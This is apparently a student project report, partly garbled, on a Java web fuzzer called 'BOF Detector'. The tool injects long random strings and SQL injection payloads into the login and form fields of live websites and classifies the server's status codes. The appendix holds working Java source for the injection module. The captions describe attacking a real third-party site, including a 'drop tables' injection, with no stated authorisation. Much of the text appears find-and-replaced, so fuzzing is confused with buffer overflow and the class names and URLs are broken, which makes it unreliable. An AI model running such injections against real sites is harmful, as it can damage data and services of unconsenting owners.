Vous êtes sur la page 1sur 58

CONTENTS

CHAPTER SECTION TOPIC PAGE


NO. NO. NO.

ACKNOWLEDGEMENTS 1
ABSTRACT 2

PROJECT OVERVIEW
1.1 Buffer overflow 4
1. 1.2 BOF Characteristics 5
1.3 How BOF Testing Works? 5
1.4 Buffer overflow Types 6
1.5 BOF Detector – Web BOFer Concept 7
1.6 Major Operations involved 7

ANALYSIS OF PROJECT
2.1 Main objective 12
2. 2.2 Process Flow Diagram of the System 12
2.3 Need of the Project 13
2.4 Project Features 14

DESIGN OF PROJECT
3.1 Functional Matrix 17
3. 3.2 Flowchart Of The Project 18
3.3 Technology Used 19

4. TIME LINE AND TASK 21


DISTRIBUTION

RESULTS AND DISCUSSION


5.1 Progress 24
5. 5.2 Screenshots 26
5.3 Validation 32
5.4 Hardware & Software Requirement 35

6. CONCLUSIONS 36
6.1 Future Progress 38

GLOSSARY 39

REFERENCES & APPENDIX 40

2
ABSTRACT

The Project in consideration explains the process of Buffer overflow a Web Portal to
uncover the possible vulnerabilities present due to insecurely written code. BOF
Detector performs a Buffer Overflow analysis to ascertain the presence of validation
within the HTML source file. Also, the application performs persistent SQL Injection
Attack by embedding the designed Username and Password tags within a Login form
with the SQL queries. The modified HTML file is then submitted to the Web Server as
specified in the FORM tag. The responses sent by the Web Server is received and
analyzed by the Application in terms of HTTP Status Codes which are an important
indication for the presence of vulnerability in the computer. Thus, the overall analysis
showcased by the application is a significant benchmark for a website and it is vital
to overcome the presence of such vulnerabilities for a Web Portal Testing Team.

2
CHAPTER 1
PROJECT OVERVIEW

3
Whenever an Input tag in an HTML source file is embedded with a large random String
or a SQL directive and submitted to the HTTP Web Server, the response obtained from
the Web Server in terms of HTTP status codes is a true indication of the state the
machine is present in. It is possible and very likely that a few states would imply the
possible presence of Vulnerability, which would be a likely threat to the Web Portal
when released in the production environment. Thus, Buffer Overflow and SQL Injection
Attack form an important testing paradigm in the overall Web Testing Scenario. Also, a
short “Analysis” detailing the Test performed and the results obtained is an essential part
of the Project.

1.1 Buffer overflow:

BOF Testing, in plain terms, is a technique which tries to induce Data Corruption by
attacking an Application or a Web Page with random bad data and the resulting behavior
of the Application is logged. The intended behavior can be either the application manages
to work reasonably well or it breaks down (crashes). BOF testing approach follows no
logic whatsoever. In the case of a Human Tester, an attempt is made to guess as to what
kind of data will result in a crash in the application. In automated BOF testing, random
and gibberish data is provided to a program. Failure state observed by such testing
usually comes as a complete shock to programmers because no logical person would ever
conceive them.

Though Buffer overflow is a simple technique, it is still capable of revealing important


bugs in the program and web pages. The vulnerabilities uncovered should help in
knowing potential avenues of attack that should be plugged before the software is
shipped or Web Portal is put online in the Internet Information Superhighway.

Thus, every BOFer is expected to find different set of bugs. The actual usage of Buffer
overflow is in testing domain. But as BOF testing has become even more well-known,
it can be used as a tool of exploitation by an attacker. It is a similar to Fault
Injection and the random nature of data is not quite helpful in some cases as catching
a boundary value condition with total random inputs is highly unlikely.

4
1.2 BOF Characteristics:

 Automated Penetration Testing Tool


 Finds vulnerabilities which would not be detected with common Functional Testing
Approach
 Most of the BOFers are free tools or commonly under Open Source Projects
 Typically gives a true picture about the robustness of an application

BOFer tools work best for problems that can induce a program to crash, such as Buffer
Overflow, Cross-Site Scripting, Denial Of Service attacks, Format String bugs and SQL
Injection. These traits are often utilized by an attacker on purpose of wreaking the
greatest possible amount of havoc in the least possible time. BOF testing is less effective
for dealing with security threats that do not cause program crashes, such as Spyware,
some Viruses, Worm, Rabbits and Trojan Horse.

BOF testing can often reveal defects that are overlooked when software is written and
debugged. Nevertheless, BOF testing usually finds only the most serious faults. BOF
testing alone cannot provide a complete picture of the overall security, quality or
effectiveness of a program in a particular situation or application. BOFers are most
effective when used in conjunction with extensive alpha testing, beta testing,, black box
testing, and other proven debugging methods.

1.3 How BOF Testing Works?

BOF testing is a very simple procedure to implement:

1. Prepare a correct file to input to your program


2. Replace or alter some part of the file with arbitrary randomly generated data.
3. Pass the file to the program
4. Observe the behavior

5
Input File Program Expected
Result

Normal Functioning of a File within a Program

Tampered Program Unknown


Input file Result

Unexpected or Unknown functioning of a File within a


Fuzzer Program

Typical Fuzzer Working

1.4 Buffer overflow Types:

Fuzzer

Random Fuzzer Context-Aware Adaptive Fuzzer


Fuzzer
Simply inserts Well aware of Performs
random the format and changes to the
characters and type of the file to next corruption
strings. Hence, be fuzzed and data based purely
aptly called as a inserts the on execution
Dumb Fuzzer! random data

Categories of Fuzzers

6
1.5 BOF Detector – Web BOFer Concept:

BOF Detector is a context-aware type of BOFer where by it is aware of the HTML


source file to be BOFed. Our project scope is limited to dealing with „input‟ tag
expressions. Steps involved in the case of BOF Detector are as follows:
BOF Detector fetches a HTML source file from a URL using HTTPConnection class.
BOF Detector traverses through the HTML Source file and populates a List
containing all the different types of input commands corresponding to a particular
form on a Web Page file.
Random strings are generated and embedded into the „input‟ tags in the „value‟ field
attribute.
Page is resubmitted to the „action‟ field specified in the form tag.
The response received from the Server is in the form of HTTP Status Codes and is
used for analysis regarding the vulnerability status of a Web Page.

7
1.6 Major Operations involved:

The following are the major operations involved in the Fire BOFer:

Buffer Overflow Attack:


By this attack, we are trying to get past Client-Side Validations which come in effect due
to the usage of Web-Browser. Since, we are not working with Browser but directly
manipulating the HTML Source file we are able to bypass the Client Side Validations
such as Javascripts and „MAXLENGTH‟ field present in „input‟ tag fields. The „input‟
tags fetched from the HTML source file are embedded with an arbitrary long String in the
„value‟ attribute and resubmission occurs. The random String is generated by a
„randomizer‟ function. If the Server does not support proper Server-Side Validation, then
a possible crash can take place at the Server end. The result is noted by observing the
HTTP Status codes received as a response whether the attack was a success or not.

8
SQL Injection Attack:
This attack is typically for Login pages where in „Username‟ and „Password‟ is involved.
We get past the Client-Side validation in a way similar to Buffer Overflow Attack. But
instead of embedding a randomly generated String, we read a configuration file named
„inject.conf‟ which has many SQL Injections present in it. The combinations of SQL
injections are read one-by-one and embedded into the „input‟ tag field and Login page is
submitted for every single SQL injection separately. The results are again noted by
observing the HTTP Status codes received as a response whether the attack was a success
or not.

Analysis:
After the Buffer Overflow or SQL Injection attack, an analysis is done and showcased on
the Console pertaining to the attack detailing the different types of HTTP Status codes
and the number of occurrences of each which were found on the whole during the attack.

9
Manually Configurable SQL Injections:
The „inject.conf‟ file is tunable and the Attacker or Tester can add/modify/remove SQL
injections as per his wish. Each SQL injection is used one-by-one from this file and
embedded into the „input‟ tag inside the HTML Web Page and further processing is
initiated.

HTTP Status Code Responses:


The HTTP Status Codes sent as a response along with Web Content gives hindsight to
the HTTP Client Application about the internal operation and current state of the Web
Server. They have been standardized and classified into 5 major types:
Informational 1xx: This class of status codes indicates a response consisting of
Status Line and optional headers and is terminated by a new line.

Successful 2xx: This class of status code suggests that the Client‟s request was
successfully received, understood and accepted.

Redirection 3xx: Such status code showcases that infinite redirection loops do exist
within the Web Form and that further action has to be carried out by the User to fulfill
the Request while you travel.

Client Error 4xx: Such status codes showcases that the Client has caught Exceptions.

Server Error 5xx: Such class of status code showcases that Server has caught some
exception which has occurred and the Client‟s requests cannot be performed.

 Running the Project:


To run the Buffer Overflow part of the Project, type the following at the command
prompt:
$ java BOF Detector <url> buffer (detail-optional)
To run the SQL Injection part of the Project, type the following at the command
prompt:
$ java BOF Detector <url> sql (detail-optional)

10
CHAPTER 2
ANALYSIS OF PROJECT

11
2.1 Main objective:

It defines the chief principle of the system to provide a structure around which the design
can be developed.
The purpose of this application is to provide a mechanism for vulnerability detection in
Web Pages. BOF Detector is a Web Site vulnerability detector which rigorously
injects malformed data and SQL injections within the input tag of an HTML source file
fetched from the Web Server. It then analyzes the HTTP status codes received as a
response from the Web Server as a possible indication for hidden vulnerabilities.

There are many BOFers already present in the market written in Perl and Python. BOF
Detector, written exclusively in Java is going to be very popular and can be used by
Web Portal Testing teams before putting their Site into Production.

2.2 Process Flow Diagram of the System:

The Process Flow Diagram is the framework that describes how the system component
interacts and work together to achieve the overall system goals. It describes the system
operation, what each component of the system does and what information is exchanged
amongst the components. The process flow is designed for basically getting an idea of
how the actual system works and operates.

Fetch HTML Source


STAGE 1 File from Remote
Server

FireFuzzer Remote
User Application Web
server
STAGE 2

Submit modified HTML


Console Source File to Remote
Server & receive HTTP
status code response

12
Figure above shows the process flow design of the FireFuzzer project
Process Flow Diagram Explanation:

The User can be either a Software tester or an alleged Attacker.


BOF Detector application consists of the BOF Detector.java, BufferOverflow.java and
SQLInjection.java. Also, the configuration file „inject.conf‟ is a part of the BOF
Detector application.
Target Remote Web Server URL is passed as a parameter to the BOF Detector application.
The results and analysis pertaining to the Buffer Overflow and SQL Injection attacks are
usually displayed on the Console.

2.3 Need of the Project:

There are more than million websites on the Internet. With such a tremendous growth, the
issue of security has achieved a wide angle and is very important due to the following
reasons:
Most of the transactions are
Online Usage of Legacy Code
User Trust factor
Shift in focus of Attacker towards monetary benefits
Poorly written code
There are many more reasons besides these. The security can be maintained by having
Secure Coding practice. But, that is not always the case. Hence, there is a need for an
application tool which would be able to uncover vulnerabilities besides those which are
already well-known. If such vulnerabilities are uncovered, then the security of the
product can be enhanced and guaranteed to a large extent. Software Testers would benefit
tremendously from such a utility. We look into the following categories of errors:

Failure to handle exceptions


Failure to validate input on
server Usage of HTTP status
codes

13
2.4 Project Features:
Level Description Entities Involved Operations Involved
0 User Software Tester Passes URL as a parameter for BOF
Attacker Testing
(Hacker/Cracker) For more detailed analysis, „detail‟
parameter can be passed by User in
the command prompt expression
Closely observes the Analysis
obtained from the BOF program for
possible vulnerabilities
1 BOF BOF Detector Fetches the HTML source code for a
Detector Module given URL
Application and external files Generates a Random String using
Java Random class
In the case of Buffer Overflow
Attack, it embeds the Random String
inside the ‟input‟ tag field of the
HTML source file
Submits the form with the embedded
random String
In the case of SQL Injection Attack, it
fetches SQL Injections from a
inject.conf file and embeds those into
the „input‟ tags of the „LOGIN‟ forms
and submits the form
Receives the HTTP Status Code
response from the Server
Showcases Analysis by categorizing
the HTTP Status Code responses
Can show Server Response by using
the „detail‟ parameter while executing
the application

14
2 Remote HTTP Web Server, Acknowledges the HTTP request
Web Server Database Server, from the HTTP client program
etc. Responds by sending the requested
Web Page
Upon receiving the submitted form
using the POST method, it processes
the information received.
Due to the information received from
the HTTP Client, the Server can
either work properly or can crash (due
to the mangled data sent in SQL
Injection or Buffer Overflow Attack)
Sends back the response along with
HTTP Status Code

15
CHAPTER 3
DESIGN OF PROJECT

16
3.1 Functional Matrix:
<Tabulation done on basis of Input to Actors involved>

Input to BOF Detector:

Input Process Output


URL provided by the User Sends HTTP Connection Connection is established
(Software Tester or Request and requests for due to TCP Handshake and
Hacker) the HTML source page BOF Detector is waiting
from the specified URL + for HTML content from
TCP Handshake is the server
performed
(Stage 1) Receives the Parses the HTML source Submits the modified
HTML source file content file and embeds a large HTML source file to the
from the Web Server upon random string or a SQL URL specified in the action
sending the URL request Injection query inside the attribute of the Form page
using the „input‟ tag using the POST method
HTTPConnection class
(Stage 2) Receives the Processes the HTTP Status Showcases the detailed
Response (HTTP Status code and begins logging it analysis about the different
Code + Resulting content in a data structure for HTTP Status code in a
due to submission of the further analysis purpose categorical manner and
form) from the HTTP also each and every single
Web Server when Server response if „detail‟
mangled data or SQL parameter is passed at the
Injection string was command prompt
submitted

Input to HTTP Web Server:

Input Process Output


(Stage 1) HTTP Performs TCP Handshake Connection is established
Connection Request and + dispatches the HTML due to TCP Handshake and
HTML content request source page to the Acknowledgement is
sent by the HTTP Client requesting HTTP Client received for the sent
Application Application HTML content
(Stage 2) Submission of Processes the contents in Receives
the Form contents using the URL sent with the acknowledgement for the
POST method containing POST method and sends sent Response (HTTP
mangled data or SQL appropriate response Status code + resulting
Injection string content due to submission
of the form)

17
3.2 Flowchart of the Project:

Start

User provides a URL to


the FireFuzzer along
with Attack Name

FireFuzzer does
TCP handshake to
establish connection
with Web Server

Connection
Established

FireFuzzer receives the


HTML Source file (content)
from the Web Server

SQL Injection Attack Buffer Overflow Attack


Attack
Type?
Embeds SQL Embeds Randomly
Injection in generated String in
„input‟ tag „input‟ tag

Submits the form to the


designated target URL
specified in Form tag FireFuzzer
receives HTTP
Status Code from
FireFuzzer HTTP Server
showcases
Exit
Analysis

18
3.3 Technology Used:

Java 1.6.07

Java was the backbone of our project. With the latest release of version 1.6, the Scanner
class is phenomenal and it makes life so much easier rather than using the
StringTokenizer class. As we all know, the Java programming language is a Sun
Microsystems propriety product and is a major open source technology which is used
widely in all disciplines of technology and application development. Java technology's
versatility, efficiency, platform portability, and security make it the ideal technology for
network computing. From laptops to datacenters, game consoles to scientific
supercomputers, cell phones to the Internet, Java is everywhere! The statistics available
from Sun Microsystems website states that Java powers more than 4.5 billion devices
including PC‟s, mobile phones, smart cards, printers, car navigation, medical devices, etc.

Jericho HTML Parser


Jericho HTML Parser is a java library allowing analysis and manipulation of parts of
an HTML document, including server-side tags, while reproducing verbatim any
unrecognized or invalid HTML. It also provides high-level HTML form manipulation
functions.

19
Eclipse 3.4.2

Eclipse was the default IDE of our choice due to the Open Source movement. The
intuitive programming environment is really helpful especially with the large number of
extensible features provided. The plug-ins support is probably the biggest feature of
Eclipse and it allows the user to add more and more technology and components and
work on different environments. In its default form, Eclipse supports Java and consists of
large number of Java Development Tools (JDT). Eclipse currently supports more than
100 programming languages as plug-ins and this number keeps growing by the day.

Apache Jakarta Components

The Jakarta Components including HTTPComponent was a boon for us as we could work
with the HTTP Headers very easily. It was because of HTTPComponents that we were
able to submit the forms with mangled data to the Web Server and understand the Status
Codes sent as a response to the Client. The Hyper-Text Transfer Protocol (HTTP) is
perhaps the most significant protocol used on the Internet today and HttpComponents
play a big role while building HTTP-aware client and server applications such as web
browsers, web spiders, HTTP proxies, web service transport libraries, or systems that
leverage or extend the HTTP protocol for distributed communication.

20
CHAPTER 5
TIME LINE AND TASK DISTRIBUTION

21
Gantt Chart:

= BOF Detector Team

22
CHAPTER 5
RESULTS AND DISCUSSION

23
5. 1 Progress:

Project Proposal

Analysis of
existing Fuzzers

Functional Matrix

Flowcharts Implementing FireFuzzer


using JDK 1.6

Utilized 3rd party


Components

Testing

Documentation

Figure showing the Progressive Stages performed during our entire Project

24
 Project Proposal:
This was the first step in our project endeavor. We did Requirement Analysis
regarding the kind of data we are going to interact with in the Input file and
what actions we need to undertake over that very data.
 Functional Matrix:
It basically consists of 3 columns comprising of Input, Process and Output.
The Input at each Entity undergoes certain processing which is displayed at
the Output. Also, it helped us in gathering the complete know-how about the
features and concepts pertaining to each Entity and their requirements
 Analysis of Existing BOFers:
There are several BOFers which are implemented and it was important for us
to understand how they approach the problem of unearthing vulnerabilities in
Software Applications. We tried to map a similar approach as used in
„PowerBOFer‟.
 Flowcharts:
The flowchart is used to show the flow of processes between entities. It also
showcased the conditional events which helped to reach different conclusions
at the end.
 Implementing BOF Detector using JDK 1.6:
Java was the default choice of programming language for working on the
Project. It has many extensible classes which help in Socket programming and
String Manipulations among others which was required on a large scale in the
project.
 Utilizing 3rd Party components:
We made use of Apache Jakarta Jars and Jericho Parser for the purpose of
resubmission of Web Forms, extracting the information pertaining to HTTP
Status Code and parsing the HTML source file respectively.
 Testing:
This helped us in performing various tests on our system. It suggested the
success or failure of the various the components.
 Documentation:
In Documentation, we prepared Presentation slides, Final Project Report and
also the packing along with makefile for Project Deployment.

25
5.2 Screenshots: (UNDERSTANDING BUFFER OVERFLOW)

Step 1: We wish to perform Buffer Overflow over www.rediff.com

Step 2: We start the run configuration in Eclipse

26
Step 3: We choose to perform Buffer Overflow by using the parameter ‘buffer’

Step 4: We can see the Buffer Overflow attack and one 5xx Server Error is
reported as shown above

27
Step 5: Observe the detail view in Buffer Overflow by using ‘detail’ parameter

Step 6: Observe the Server responses shown in detail view above

28
Step 7: Final Analysis in Buffer Overflow done using detailed view

29
(UNDERSTANDING SQL INJECTION)

Step 1: Performing SQL Injection on a website using ‘detail’ parameter to see


the Server Responses one by one

Step 2: SQL Injection in progress

30
Step 3: An Internel Server Error Encountered due to a SQL injection namely
‘; drop tables –

Step 4: Final SQL Injection Analysis

31
5.3 Validation:

Step 1: We wish to pass NO PARAMETERS to the Program

Step 2: Program has handled the exception by stating a suggestion

32
Step 1: We wish to pass ‘buff’ which is a wrong parameter to the Program
(correct should be ‘buffer’)

Step 2: Program has handled the exception by stating a suggestion

33
Step 1: Our program runs only for http connections and not for https.
https://cubmail.cc.columbia.edu is also handled as shown below

34
5.4 Hardware and Software Requirement:

HARDWARE:
Number Description Alternatives (if available)

1 PC with 2 GB hard-disk and 256 MB Ram Not Applicable

2 Internet connection Not Applicable

SOFTWARE:
Number Description Alternatives (if applicable)

1 Windows XP Linux Distributions

2 Java Runtime Environment (JRE 1.6) Not Applicable

35
CHAPTER 6
CONCLUSION

36
BOF Detector showcases the vulnerabilities in typical Web sites. As per our tests,
we have proven that if these vulnerabilities come in the knowledge of Attackers
then exploitation of vulnerabilities will not take much time.

It also showcases the need for much improved and secure coding standard. Even
though a secure coding mode exists – Security Development Life Cycle, it is still
being implemented in a phased manner. That might be because corporations have not
realized it‟s importance yet.

But, it is indeed time to use penetration testing tools such as BOF Detector and the
other likes which do exist to become aware of the vulnerabilities before putting the
system into production environment. Thus, early adoption of secure coding
practice would ensure proper Security (Confidentiality, Availability and Integrity)
from Attackers, who might use such penetration testing tools which are brute-force
implementations to fulfill their evil desires.

37
6.1 Future Scope

Crawling Multiple Pages

Cross Site Scripting

Repeated Buffer overflow over a period of time

Maintenance as per required

Frequent Version updation with relevant patches

38
GLOSSARY

Availability: It is the property of a service being accessible and usable on


demand. It is opposite to Denial of Service.

Black Box Testing: It is testing without knowledge of the internal


working of the items being tested.

Buffer Overflow: It occurs when a program tries to write more data than
what the buffer can store.

Cross-Site Scripting: It involves typical code injections (mostly


Javascripts) by malicious users in web pages to catch User behavior,
login, password, etc.

BOFer: It is a tool to perform automated penetration testing of


Applications.

Software Security: It is the culmination of Availability, Confidentiality


and Integrity all together at the same time.

SQL Injection: It is a code injection technique that exploits


vulnerabilities in databases by passing unique strings which cause or
perform changes to the database.

39
REFERENCES

 Prof. Hugh Thompson‟s Software Security Course in Columbia University


(Spring 2009):
http://www.cs.columbia.edu/~hthompson/slides/lecture8.pdf

 Wikipedia, the free Encyclopedia detailing about BOF Testing:


http://en.wikipedia.org/wiki/BOF_testing

 BOF Revisited: A Re-examination of the Reliability of UNIX Utilities and


Services
ftp://ftp.cs.wisc.edu/paradyn/technical_papers/BOF-revisited.pdf

 Buffer overflow: Brute Force Vulnerability


Discovery http://www.Buffer
overflow.org/Buffer overflow-software

 Rochlis, J.A., and Eichin, M.W.,With Microscope and Tweezers: TheWorm


from MIT‟s Perspective. Communications of the ACM 32, 6 (June 1989), 689-
698.

 BOF Testing of Application Reliability, University of Wisconsin-Madison


http://pages.cs.wisc.edu/~bart/BOF/BOF.html

 HTTP Components, Apache Software Foundation


http://hc.apache.org/

 Jericho HTML Parser Documentation & Tutorials


http://jerichohtml.sourceforge.net/docs/index.html
http://jerichohtml.sourceforge.net/docs/javadoc/index.html

 The Java Tutorials, SUN Microsystems


http://java.sun.com/docs/books/tutorial/

40
APPENDIX
BOF
Detector.java:
package org.BOF
Detector.Fire; import
java.io.*;
import java.net.*;
import java.util.*;
/**
*
*/
/**
* Main Class of the Project
* */
public class BOF Detector {
private URL fURL;

/**
* Constructor checks the URL and acertains whether it is HTTP or not
* */
public BOF Detector(URL aURL) {
if ( ! "http".equals(aURL.getProtocol())) {
throw new IllegalArgumentException("URL is not for HTTP Protocol" +
": " + aURL);
}
fURL = aURL;
}

/**
* Constructor checks whether the URL is malformed or not
* */
public BOF Detector( String aUrlName ) throws MalformedURLException
{ this ( new URL(aUrlName) );
}

/**
* Fetches the HTML source file from a given URL
* */
public String getPageContent() throws IOException {
String result = null;
URLConnection connection = null;
try {
connection = fURL.openConnection();
Scanner scanner = new Scanner(connection.getInputStream());
scanner.useDelimiter("\\Z");
result = scanner.next();
}
catch ( IOException ex ) {
log("Cannot open connection to " + fURL.toString());
}
return result;
}

/**
* Logs the incoming HTML source infomation into a file
* */
private static void log(Object aObject) {

41
try {

42
FileWriter fww = new FileWriter("page.loaded");
fww.close();
FileWriter fw = new FileWriter("page.loaded",true);
fw.append(aObject.toString());
fw.close();
}
catch(Exception e) {
System.err.println("Exception occured: "+e.getMessage());
}
}

/**
* Main function of the Project to start either Buffer Overflow
* or SQL Injection Attack on the target URL
* */
public static void main(String []args) throws IOException,
InterruptedException {
System.out.println("");
System.out.println("\t8888888888 8888888 8888888b. 8888888888 8888888888 888
888 8888888888P 8888888888P 8888888888 8888888b.");
System.out.println("\t888 888 888 Y88b 888 888 888 888 d88P
d88P 888 888 Y88b ");
System.out.println("\t888 888 888 888 888 888 888 888 d88P
d88P 888 888 888 ");
System.out.println("\t8888888 888 888 d88P 8888888 8888888 888 888
d88P d88P 8888888 888 d88P ");
System.out.println("\t888 888 8888888P\" 888 888 888 888 d88P
d88P 888 8888888P\" ");
System.out.println("\t888 888 888 T88b 888 888 888 888 d88P
d88P 888 888 T88b ");
System.out.println("\t888 888 888 T88b 888 888 Y88b. .d88P d88P
d88P 888 888 T88b");
System.out.println("\t888 8888888 888 T88b 8888888888 888 \"Y88888P\"
d8888888888 d8888888888 8888888888 888 T88b ");
System.out.println("");
Thread.sleep(1000);
String url = null;

if(args.length==2 || args.length==3) {
url = args[0];
}
else {
System.err.println("Incorrect number of parameters");
System.err.println("Syntax is java BOF Detector <url> <buffer/sql>
<detail(OPTIONAL)>");
System.exit(0);
}
if(args[1].equalsIgnoreCase("buffer") || args[1].equalsIgnoreCase("sql")) {}
else {
System.err.println("Incorrect parameters entered");
System.err.println("Syntax is java BOF Detector <url> <buffer/sql>
<detail(OPTIONAL)>");
System.exit(0);
}
if(args.length==3) {
if(args[2].equalsIgnoreCase("detail")) {}
else {
System.err.println("Incorrect parameters entered");
System.err.println("Syntax is java BOF Detector <url> <buffer/sql>
<detail(OPTIONAL)>");

43
System.exit(0);
}
}
if(url.contains("http://")) {}
else if(url.startsWith("www."))
url="http://"+url;
else {
System.out.println("Only http protocol based sites are handled. Wait for future
release.");
System.exit(0);
}
new File("page.loaded").deleteOnExit();
new File("temp.html").deleteOnExit();

System.out.println("#########################################################
###############################################################");
System.out.println("Targeted URL: "+url);

System.out.println("#########################################################
###############################################################");
BOF Detector fetcher = new BOF Detector(url);
log(fetcher.getPageContent());
if(args[1].equalsIgnoreCase("buffer")) {
BufferOverflow bo = new BufferOverflow();
if(args.length==3)
if(args[2].equalsIgnoreCase("detail"))
bo.globalDetailFlag = true;
bo.globalURL=url;
System.out.println("<---BUFFER OVERFLOW ATTACK--->");

System.out.println("#########################################################
###############################################################");
bo.parseInput();
bo.analyzeBufferOverflow();
}
else if(args[1].equalsIgnoreCase("sql")) {
SQLInjection sql = new SQLInjection();
if(args.length==3)
if(args[2].equalsIgnoreCase("detail"))
sql.globalDetailFlag = true;
sql.globalURL=url;
System.out.println("<---SQL INJECTION ATTACK--->");

System.out.println("#########################################################
###############################################################");
sql.parseInput();
sql.analyzeSQLInjection();
}
}
}

44
SQLInjection.java:
package org.BOF Detector.Fire;
import java.io.BufferedReader;
import java.io.FileNotFoundException;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.io.UnsupportedEncodingException;
import java.net.MalformedURLException;
import java.net.URLEncoder;
import java.util.List;
import java.util.StringTokenizer;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import net.htmlparser.jericho.Attributes;
import net.htmlparser.jericho.HTMLElementName;
import net.htmlparser.jericho.Source;
import net.htmlparser.jericho.StartTag;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpStatus;
import org.apache.commons.httpclient.methods.PostMethod;
class SQLInjection {
private static int countForms = 0;
private static int countInputs = 0;
private static String var;
private static int []arrayBuffer = new int[5];
public static String globalURL;
public static boolean globalDetailFlag = false;
public static boolean flipFlop = false;

/**
* Initializes the Array
* */
public SQLInjection() {
for(int i=0;i<arrayBuffer.length;i++) {
arrayBuffer[i]=0;
}
}

/**
*Performs analysis over SQL Injection and showcases the result to the User
*/
public static void analyzeSQLInjection() {

System.out.println("###########################################################
#############################################################");
System.out.println("<---SQL INJECTION ANALYSIS--->");
System.out.println("Total # of Forms: "+countForms);
System.out.println("<<-Categorizing the available data on basis of HTTP Status Codes-
>>");
System.out.println("Informational Codes 1xx Series: "+arrayBuffer[0]);
System.out.println("Successful Client Interaction related 2xx Series: "+arrayBuffer[1]);
System.out.println("Redirection related 3xx Series: "+arrayBuffer[2]);
System.out.println("Client Error related 4xx Series: "+arrayBuffer[3]);
System.out.println("Server Error related 5xx Series: "+arrayBuffer[4]);

System.out.println("###########################################################
#############################################################");

45
System.out.println("###########################################################
#############################################################");
System.out.println("For more Information on HTTP Status Code Series, refer the
'HTTP_STATUS_CODE.pdf' in Document folder.");

System.out.println("###########################################################
#############################################################");
}

/**
* Traverses over the HTML source file and embeds it with huge sounds
* */
private static void sendBack(String data) throws MalformedURLException,IOException
{ HttpClient client = new HttpClient();
client.getParams().setParameter("http.useragent", "Mozilla/5.0 (X11; U; Linux i686; en-
US; rv:1.9.0.10) Gecko/2009042708 Fedora/3.0.10-1.fc10 Firefox/3.0.10");
if(globalDetailFlag==true)
System.out.println("URL: "+var);
PostMethod method = new PostMethod(var);
BufferedReader br = null;
StringTokenizer str = new StringTokenizer(data,"#");
countInputs+=str.countTokens();
while(str.hasMoreTokens()) {
StringTokenizer strr = new StringTokenizer(str.nextToken(),",");
String attrib = strr.nextToken();
String value = strr.nextToken();
method.addParameter(attrib,value);
}

try{
//System.out.println(method.getResponseHeaders());
int returnCode = client.executeMethod(method);
if(globalDetailFlag==true)
System.out.println("Status: "+method.getStatusCode());
arrayBuffer[(method.getStatusCode()/100)-1]++;
if(returnCode == HttpStatus.SC_NOT_IMPLEMENTED) {
System.err.println("The Post method is not implemented by this URI");
method.getResponseBodyAsString();
}
else {
br = new BufferedReader(new
InputStreamReader(method.getResponseBodyAsStream()));
String readLine;
PrintWriter pw = new PrintWriter("temp.html");
pw.println("Address: "+var);
while(((readLine = br.readLine()) != null)) {
pw.println(readLine);
pw.flush();
}
}
}
catch (Exception e) {
System.err.println(e);
}
finally {
//new ProcessBuilder("firefox", "temp.html").start();
method.releaseConnection();

if(br != null)

46
try {
br.close();
}
catch (Exception fe) {}
}
}

/**
* Parses the HTML source input file and populates the List data structure*/
public static void parseInput() throws IOException{
Source source = null;
try {
source = new Source(new FileReader("page.loaded"));
}
catch (FileNotFoundException fnfe) {
System.err.println("File not found. Error: "+fnfe.getMessage());
}
catch (IOException ioe) {
System.err.println("IOException occurred. Error: "+ioe.getMessage());
}
int currentLoop = 0;
int currentForm = 0;

List<StartTag> branches=source.getAllStartTags(HTMLElementName.FORM);
countForms = branches.size();

System.out.println("###########################################################
#############################################################");
Attributes attr;
String s="",data = "";
String str = "",pattern = "",temp = "";
String[] tempStr = null;

BufferedReader br = new BufferedReader(new FileReader("inject.conf"));


while((s=br.readLine())!=null) {
if(!s.isEmpty()) {
currentLoop++;
for(StartTag sj:branches) {
currentForm++;
attr=sj.getAttributes();
data="";
List<StartTag> segments =
sj.getElement().getAllStartTags(HTMLElementName.INPUT);
str = "";
pattern = "";
temp = "";
tempStr = null;

for (StartTag startTag : segments) {


str = "";
temp="";

Attributes attributes=startTag.getAttributes();
String random = s;
String rel=attributes.getValue("type");
if(rel==null)
continue;
if(rel.equalsIgnoreCase("text") ||/* rel.equalsIgnoreCase("hidden") ||
*/rel.equalsIgnoreCase("password")) {
str = startTag.toString();

47
if(str.contains("value")) {
String atrString = attributes.toString();
StringTokenizer strAtr = new StringTokenizer(atrString);
String strtag = "<input ";
while(strAtr.hasMoreTokens()) {
String strA = strAtr.nextToken();
if(!strA.contains("value")) {
strtag = strtag+strA+" ";
}
}
strtag=strtag+"value=\""+random+"\"/>";
temp=strtag;
}
else {
pattern = "/>";
Pattern p = Pattern.compile(pattern);
Matcher m = null;
if(p.matcher(str).find()) {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = "/>";
String replace = " value=\""+random+"\"/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
else {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = ">";
String replace = " value=\""+random+"\"/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
}
try {
data+=URLEncoder.encode(attributes.getValue("name"),"UTF-8")+ "," +
URLEncoder.encode(random, "UTF-8")+"#";
}
catch(UnsupportedEncodingException uee) {
System.err.println("Unsupported error");
}
}
}
var=attr.getValue("action");
if(var==null || var.equals("")) {
System.err.println("No URL specified in FORM TAG-ACTION field");
continue;
}
if(var.charAt(0)=='/') {
var=globalURL+var;
}
else if(!var.contains("http") & !var.contains("https")& !var.contains("www")) {

48
int ind=globalURL.lastIndexOf("/");
int cind=globalURL.lastIndexOf("//");
String rt;
if(ind==cind+1) {
rt=globalURL;
}
else {
rt=globalURL.substring(0,ind);
}
var=rt+'/'+var;
}
if(globalDetailFlag==true) {
System.out.println("data: "+data);
System.out.println("SQL Injection #: "+currentLoop);
}
if(globalDetailFlag==false)
if(flipFlop==false) {
System.out.println(">>");
flipFlop=true;
}
else {
System.out.println("<<");
flipFlop=false;
}
sendBack(data);
if(globalDetailFlag==true)

System.out.println("###########################################################
#############################################################");
}
}
}
}
}

49
BufferOverflow.java:
package org.BOF Detector.Fire;
import java.io.BufferedReader;
